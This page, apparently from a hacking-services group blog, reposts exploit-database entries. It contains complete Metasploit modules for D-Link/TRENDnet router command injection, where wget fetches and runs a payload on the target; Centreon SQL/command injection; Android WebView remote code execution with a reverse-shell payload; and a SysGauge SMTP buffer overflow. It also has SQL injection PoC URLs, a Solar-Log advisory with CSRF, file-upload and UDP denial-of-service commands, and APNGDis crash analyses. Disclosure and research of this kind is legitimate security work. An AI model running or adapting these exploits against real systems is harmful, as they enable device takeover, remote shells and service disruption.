##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking # Only tested on Emulated environment
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link/TRENDnet NCC Service Command Injection',
'Description' => %q{
This module exploits a remote command injection vulnerability on several routers. The
vulnerability exists in the ncc service, while handling ping commands. This module has
been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices
are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
(Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
v2.01b01
},
'Author' =>
[
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-1187'],
['BID', '72816'],
['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
],
'Targets' =>
# Only tested on D-Link DIR-626L where wget is available
[
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
[ 'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
],
'DisclosureDate' => 'Feb 26 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
# unknown if other devices also using mini_httpd
if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exec_command(cmd, timeout = 20)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'encode_params' => false,
'vars_post' => {
'ccp_act' => 'ping_v6',
'ping_addr' => '$(' + cmd + ')'
}
}, timeout)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def primer
@payload_url = get_uri
wget_payload
end
def exploit
print_status("Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
end
print_status("Exploiting...")
@pl = generate_payload_exe
@payload_url = ''
@dropped_elf = rand_text_alpha(rand(5) + 3)
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
chmod_payload
exec_payload
else
@payload_url = datastore['EXTURL']
wget_payload
chmod_payload
exec_payload
end
end
def wget_payload
upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
print_status("Downloading the payload to the target machine...")
res = exec_command(cmd)
if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
register_files_for_cleanup(upload_path)
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end
def chmod_payload
cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
print_status("chmod the payload...")
res = exec_command(cmd, 1)
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
end
Rex.sleep(1)
end
def exec_payload
cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
print_status("Executing the payload...")
res = exec_command(cmd, 1)
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
end
Rex.sleep(1)
end
# Handle incoming requests to the HTTP server
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status('Sending payload...')
send_response(cli, @pl)
end
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863584431
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Centreon SQL and Command Injection',
'Description' => %q{
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
injection in the displayServiceStatus.php component, it is possible to execute arbitrary
commands as long as there is a valid session registered in the centreon.session table.
In order to have a valid session, all it takes is a successful login from anybody.
The exploit itself does not require any authentication.
This module has been tested successfully on Centreon Enterprise Server 2.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MaZ', # Vulnerability Discovery and Analysis
'juan vazquez' # Metasploit Module
],
'References' =>
[
['CVE', '2014-3828'],
['CVE', '2014-3829'],
['US-CERT-VU', '298796'],
['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
],
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1500, # having into account 8192 as max URI length
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
}
},
'Targets' =>
[
['Centreon Enterprise Server 2.2', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 15 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
], self.class)
end
def check
random_id = rand_text_numeric(5 + rand(8))
res = send_session_id(random_id)
unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
return Exploit::CheckCode::Safe
end
injection = "#{random_id}' or 'a'='a"
res = send_session_id(injection)
if res && res.code == 200
if res.body && res.body.to_s =~ /sh: graph: command not found/
return Exploit::CheckCode::Vulnerable
elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
return Exploit::CheckCode::Detected
end
end
Exploit::CheckCode::Safe
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
elsif check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?")
end
print_status("Exploiting...")
random_id = rand_text_numeric(5 + rand(8))
random_char = rand_text_alphanumeric(1)
session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
res = send_template_id(session_injection, template_injection)
if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
vprint_status("Output: #{res.body}")
end
end
def send_session_id(session_id)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
'vars_get' =>
{
'session_id' => session_id
}
)
res
end
def send_template_id(session_id, template_id)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
'vars_get' =>
{
'session_id' => session_id,
'template_id' => template_id
}
}, 3)
res
end
def mysql_payload
p = ''
payload.encoded.each_byte { |c| p << "#{c},"}
p
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/android'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Android
VULN_CHECK_JS = %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
autopwn_info(
:os_name => OperatingSystems::Match::ANDROID,
:arch => ARCH_ARMLE,
:javascript => true,
:rank => ExcellentRanking,
:vuln_test => VULN_CHECK_JS
)
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
'Description' => %q{
This module exploits a privilege escalation issue in Android < 4.2's WebView component
that arises when untrusted Javascript code is executed by a WebView that has one or more
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
APIs exposed by the Interface and execute arbitrary commands.
Some distributions of the Android Browser app have an addJavascriptInterface
call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
4.1.2 release of Android is known to be vulnerable.
A secondary attack vector involves the WebViews embedded inside a large number
of Android applications. Ad integrations are perhaps the worst offender here.
If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
into the page displayed in the WebView, then you can inject the html/js served
by this module and get a shell.
Note: Adding a .js to the URL will return plain javascript (no HTML markup).
},
'License' => MSF_LICENSE,
'Author' => [
'jduck', # original msf module
'joev' # static server
],
'References' => [
['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
['URL', 'http://50.56.33.56/blog/?p=314'],
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
['CVE', '2012-6636'], # original CVE for addJavascriptInterface
['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
['EDB', '31519'],
['OSVDB', '97520']
],
'Platform' => ['android', 'linux'],
'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Dec 21 2012',
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_name => OperatingSystems::Match::ANDROID,
:vuln_test => VULN_CHECK_JS,
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
}
))
deregister_options('JsObfuscate')
end
# Hooked to prevent BrowserExploitServer from attempting to do JS detection
# on requests for the static javascript file
def on_request_uri(cli, req)
if req.uri =~ /\.js/
serve_static_js(cli, req)
else
super
end
end
# The browser appears to be vulnerable, serve the exploit
def on_request_exploit(cli, req, browser)
arch = normalize_arch(browser[:arch])
print_status "Serving #{arch} exploit..."
send_response_html(cli, html(arch))
end
# Called when a client requests a .js route.
# This is handy for post-XSS.
def serve_static_js(cli, req)
arch = req.qstring['arch']
response_opts = { 'Content-type' => 'text/javascript' }
if arch.present?
print_status("Serving javascript for arch #{normalize_arch arch}")
send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
else
print_status("Serving arch detection javascript")
send_response(cli, static_arch_detect_js, response_opts)
end
end
# This is served to requests for the static .js file.
# Because we have to use javascript to detect arch, we have 3 different
# versions of the static .js file (x86/mips/arm) to choose from. This
# small snippet of js detects the arch and requests the correct file.
def static_arch_detect_js
%Q|
var arches = {};
arches['#{ARCH_ARMLE}'] = /arm/i;
arches['#{ARCH_MIPSLE}'] = /mips/i;
arches['#{ARCH_X86}'] = /x86/i;
var arch = null;
for (var name in arches) {
if (navigator.platform.toString().match(arches[name])) {
arch = name;
break;
}
}
if (arch) {
// load the script with the correct arch
var script = document.createElement('script');
script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
script.setAttribute('type', 'text/javascript');
// ensure body is parsed and we won't be in an uninitialized state
setTimeout(function(){
var node = document.body \|\| document.head;
node.appendChild(script);
}, 100);
}
|
end
# @return [String] normalized client architecture
def normalize_arch(arch)
if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
end
def html(arch)
"<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"
end
end
# # # # #
# Exploit Title: Flippa Clone - SQL Injection
# Google Dork: N/A
# Date: 23.03.2017
# Vendor Homepage: http://www.snobscript.com/
# Software: http://www.snobscript.com/downloads/flippa-clone/
# Demo: http://flippaportal.scriptfirm.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/domain-details/[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/site-details/[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/ask-a-question/[SQL]
# Etc...
# # # # #
###############################################################################################
# Exploit Title: Joomla Modern Booking - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017
# PoC:
# coupon Parameter Vulnerable To SQLi
# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking
# L u Arg
###############################################################################################
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::TcpServer
Rank = NormalRanking
def initialize()
super(
'Name' => 'SysGauge SMTP Validation Buffer Overflow',
'Description' => %q{
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.
},
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'Peter Baris' # Initial discovery and PoC
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '41479' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 306,
'BadChars' => "\x00\x0a\x0d\x20"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
'Offset' => 176,
'Ret' => 0x6527635E # call esp # QtGui4.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Feb 28 2017',
'DefaultTarget' => 0
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
])
end
def on_client_connect(c)
# Note here that the payload must be split into two parts.
# The payload gets jumbled in the stack so we need to split
# and align to get it to execute correctly.
sploit = "220 "
sploit << rand_text(target['Offset'])
# Can only use the last part starting from 232 bytes in
sploit << payload.encoded[232..-1]
sploit << rand_text(2)
sploit << [target.ret].pack('V')
sploit << rand_text(12)
sploit << make_nops(8)
# And the first part up to 232 bytes
sploit << payload.encoded[0..231]
sploit << "ESMTP Sendmail \r\n"
print_status("Client connected: " + c.peerhost)
print_status("Sending payload...")
c.put(sploit)
end
end
SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLogâ„¢" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."
Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html
Business recommendation:
------------------------
SEC Consult recommends to immediately install the available firmware update
and restrict network access.
Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.
An attacker can download the configuration file without authentication and
extract the password to login to Solar-Log. Therefore, an attacker can gain
administrative access to such a device without prior authentication.
2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.
A CSRF vulnerability enables an attacker to remove/modify a password of a
device by luring an authenticated user to click on a crafted link. An attacker
is able to take over the device by exploiting this vulnerability.
3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.
Any files can be uploaded on the Solar-Log by using a crafted POST request. An
attacker can start a malicious website or use the Solar-Log as share to store
any (illegal) contents.
4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)
The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.
All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.
5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)
Since the Solar-Log is based on the chips of Beck IPC a UDP configuration
server is enabled by default. This server allows to change the IP configuration
over a specific UDP port. This functionality can be protected with a password,
but this is not set in the affected firmware versions.
The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.
6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)
The Beck IPC UDP configuration server on Solar-Log device can be attacked with
arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.
7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)
Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip
over the network via UDP, a missing password can also enable an attacker to do
this on a Solar-Log device. This action can lead to a simple Denial of Service
or a complex botnet of Solar-Log devices!
Proof of concept:
-----------------
1) Unauthenticated Download of Configuration including Device-Password
The full configuration is exposed by sending the following GET-request:
-------------------------------------------------------------------------------
GET /data/misc.dat HTTP/1.1
Host: <IP-Address>
[...]
-------------------------------------------------------------------------------
Since the response contains the password, an attacker can easily take
control over the device.
2) Cross-Site Request Forgery
By luring the user to issue the following request, the password is removed:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>
preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------
By luring the user to issue the following request, the password is modified:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>
preval=none;postval=105;{"221":"0","223":"1","224":"<New-Password>","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------
3) Unauthenticated Arbitrary File Upload
Any files can be uploaded by using the following POST-request:
-------------------------------------------------------------------------------
POST /menu/d_debug_db.html HTTP/1.1
Host: <IP-Address>
[...]
Referer: http://<IP-Address>/menu/d_debug_db.html
Content-Type: multipart/form-data; boundary=--------301473270
Content-Length: 341
----------301473270
Content-Disposition: form-data; name="DESTINATION-PATH"
PoC.html
----------301473270
Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt"
Content-Type: text/plain
<html>
<head>
<title>SEC-Test</title>
</head>
<body>
<script>alert("XSS-PoC");</script>
</body>
</html>
----------301473270
Content-Disposition: form-data; name="L_UPLOAD"
Hochladen
----------301473270--
-------------------------------------------------------------------------------
The uploaded content can be reached by this link:
http://<IP-Address>/PoC.html
4) Information Disclosure (CVE-2001-1341)
This vulnerability is a known issue to IPC@CHIP since 2001.
See: https://www.securityfocus.com/bid/2767/info
The following URL can be used to open the "ChipCfg" file on a Solar-Log device:
http://<IP-Address>/ChipCfg
If an attacker is in the same subnet, he can directly request this information
from the device (the device responds to multicast) with the following command:
$ echo -n "0 1 A" >/dev/udp/<Target-IP>/8001
5) Unauthenticated Change of Network-Configuration
By using the following command a change of the network configuration can be
triggerd unauthenticated on UDP port 8001:
$ echo -n "<MAC> 4 2 0 <Desired-IP-Address> <Desired-Netmask> <Desired-Gateway>" >/dev/udp/<Target-IP>/8001
Example:
$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254" >/dev/udp/192.168.4.9/8001
6) Unauthenticated Denial of Service
By using arbitrary null characters the IPC@CHIP can be pushed into an
undesired state:
$ echo -n "<MAC> 0 <IP-Address> <Netmask> <Gateway> DDDD\0\0" >/dev/udp/<Target-IP>/8001
Example:
$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD\0\0" >/dev/udp/192.168.4.5/8001
7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
This action was not tested against the device. Such attack can brick the
Solar-Log. The worst case scenario would be a botnet exploiting this vulnerability.
A network-dump of the "CHIPTOOL" would be enough to reconstruct the required
UDP packets for the attack.
Vulnerable / tested versions:
-----------------------------
Solar-Log 1200 - 3.5.2-85
Solar-Log 800e - 2.8.4-56
Since the firmware for the other Solar-Log devices is exactly the same,
other devices with the same versions are also prone to the vulnerabilities!
Vendor contact timeline:
------------------------
2017-02-02: Contacting vendor via info@solar-log.com, support@solar-log.com
and berlin@solar-log.com.
2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the
advisory unencrypted to the vendor.
2017-02-20: Asked for an update.
2017-02-21: Vendor states that the patch is in development. The update will
be published before 2017-03-24.
2017-03-14: Asked for a status update. Vendor states that the update will
be available on 2017-03-21.
2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build
86 for all affected Solar-Log devices.
Informing the vendor that the release of the advisory is set to
2017-03-22.
2017-03-22: Public advisory release.
Solution:
---------
Upgrade to firmware 3.5.3-86
http://www.solar-log.com/de/service-support/downloads/firmware.html
Workaround:
-----------
Restrict network access to the devices.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2017
# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow
Textbook buffer overflow; a fixed size buffer gets allocated with
szPath[256], and the first command line argument is stored without
validation.
int main(int argc, char** argv)
{
unsigned int i, j;
char * szInput;
char * szOutPrefix;
char szPath[256];
char szOut[256];
std::vector frames;
printf("\nAPNG Disassembler 2.8\n\n");
if (argc > 1)
szInput = argv[1];
else
{
printf("Usage: apngdis anim.png [name]\n");
return 1;
}
strcpy(szPath, szInput);
}
With 'A' * 1000 as argv[1] :
GDB:
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106 ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff70ea600 140737338320384
rcx 0x141 321
rdx 0x0 0
rsi 0x7fffffffca40 140737488341568
rdi 0x4141414141414141 4702111234474983745
rbp 0x7fffffffceb0 0x7fffffffceb0
rsp 0x7fffffffc948 0x7fffffffc948
r8 0x4141414141414141 4702111234474983745
r9 0x9 9
r10 0x73 115
r11 0x7fffffffce78 140737488342648
r12 0x555555558c9f 93824992251039
r13 0x7fffffffcec8 140737488342728
r14 0x0 0
r15 0xffffffffffffffff -1
rip 0x7ffff6dd1486 0x7ffff6dd1486 <strlen+38>
eflags 0x10297 [ CF PF AF SF IF RF ]
Valgrind:
==10685== Invalid read of size 1
==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685== by 0x5B711F8: printf (printf.c:33)
==10685== by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685== by 0x10B24E: main (apngdis.cpp:498)
==10685== Address 0x4141414141414141 is not stack'd, malloc'd or
(recently) free'd
==10685==
==10685==
==10685== Process terminating with default action of signal 11 (SIGSEGV)
==10685== General Protection Fault
==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685== by 0x5B711F8: printf (printf.c:33)
==10685== by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685== by 0x10B24E: main (apngdis.cpp:498)
Reading '==10685==
==10685== HEAP SUMMARY:
==10685== in use at exit: 0 bytes in 0 blocks
==10685== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
==10685==
==10685== All heap blocks were freed -- no leaks are possible
# Exploit Title: APNGDis image width / height Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6193
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6193
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41669.png
In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values:
‰ P N G . . . . . . . . I H D R
89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
. . . . . . . .
00 0F 00 00 00 0F 00 00
^ ^ ^ ^ ^ ^ ^ ^
Valgrind:
Reading '../w_h_chunk_poc.png'...
==10563== Invalid read of size 8
==10563== at 0x4C30260: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edb3c8 is 28,792 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
